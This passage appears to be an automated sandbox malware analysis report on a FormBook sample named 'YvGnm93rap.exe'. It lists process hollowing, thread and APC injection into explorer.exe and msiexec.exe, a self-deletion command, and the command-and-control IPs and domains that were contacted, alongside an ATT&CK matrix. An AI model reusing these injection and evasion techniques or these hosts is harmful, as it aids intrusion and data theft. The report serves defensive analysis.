            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F17D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F33D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F73540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FA3D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F7A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F24D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F24D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F24D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2F527 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2F527 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2F527 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F216E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F076E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F38EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FAFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F236CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F746A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F07E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F07E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F07E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F07E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F07E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F07E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FAFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F28E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F337F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F77794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F77794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F77794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F08794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F23F33 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F24710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\YvGnm93rap.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 104.233.238.207 80
            Source: C:\Windows\explorer.exeNetwork Connect: 195.78.66.137 80
            Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
            Source: C:\Windows\explorer.exeNetwork Connect: 37.48.65.150 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeNetwork Connect: 135.181.31.212 80
            Source: C:\Windows\explorer.exeNetwork Connect: 54.208.77.124 80
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\YvGnm93rap.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\YvGnm93rap.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\YvGnm93rap.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\YvGnm93rap.exeThread register set: target process: 3388
            Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3388
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\YvGnm93rap.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\YvGnm93rap.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 2A0000
            Source: C:\Users\user\Desktop\YvGnm93rap.exeProcess created: C:\Users\user\Desktop\YvGnm93rap.exe {path}
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\YvGnm93rap.exe'
            Source: explorer.exe, 00000003.00000000.231903702.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
            Source: explorer.exe, 00000003.00000000.232163609.0000000001980000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000000.232163609.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000003.00000000.232163609.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\YvGnm93rap.exeQueries volume information: C:\Users\user\Desktop\YvGnm93rap.exe VolumeInformation
            Source: C:\Users\user\Desktop\YvGnm93rap.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\YvGnm93rap.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\YvGnm93rap.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\YvGnm93rap.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\YvGnm93rap.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000002.266553738.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.267101341.0000000001200000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.266813664.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.227971246.00000000040B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.YvGnm93rap.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1DLL Side-Loading1Process Injection512Masquerading1Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 339311 Sample: YvGnm93rap.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 31 www.tootleshook.com 2->31 33 www.hechoenvegas.net 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 7 other signatures 2->47 11 YvGnm93rap.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\YvGnm93rap.exe.log, ASCII 11->29 dropped 57 Tries to detect virtualization through RDTSC time measurements 11->57 15 YvGnm93rap.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.puzelhome.com 195.78.66.137, 49744, 49765, 80 SUPERHOST-PL-ASPL Poland 18->35 37 www.4037a.com 104.233.238.207, 49743, 49764, 80 PEGTECHINCUS United States 18->37 39 17 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 msiexec.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            YvGnm93rap.exe46%VirustotalBrowse
            YvGnm93rap.exe26%ReversingLabsWin32.Trojan.Wacatac
            YvGnm93rap.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            2.2.YvGnm93rap.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            www.tomatrader.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bodyfuelrtd.com
            34.102.136.180
            truetrue
              unknown
              crafteest.com
              34.102.136.180
              truetrue
                unknown
                www.tomatrader.com
                37.48.65.150
                truetrueunknown
                100feetpics.com
                184.168.131.241
                truetrue
                  unknown
                  www.futbolclubbarcelona.soccer
                  54.208.77.124
                  truetrue
                    unknown
                    www.4037a.com
                    104.233.238.207
                    truetrue
                      unknown
                      www.ondesign03.net
                      135.181.31.212
                      truetrue
                        unknown
                        reversehomeloansmiami.com
                        34.102.136.180
                        truetrue
                          unknown
                          www.puzelhome.com
                          195.78.66.137
                          truetrue
                            unknown
                            www.tootleshook.com
                            unknown
                            unknowntrue
                              unknown
                              www.hechoenvegas.net
                              unknown
                              unknowntrue
                                unknown
                                www.100feetpics.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.jizhoujsp.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.jorgegiljewelry.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.amazon-support-recovery.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.8million-lr.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.reversehomeloansmiami.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.crafteest.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.bodyfuelrtd.com
                                              unknown
                                              unknowntrue
                                                unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.comexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.tiro.comexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.goodfont.co.krexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.carterandcone.comlexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.typography.netDexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://fontfabrik.comexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.247859209.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
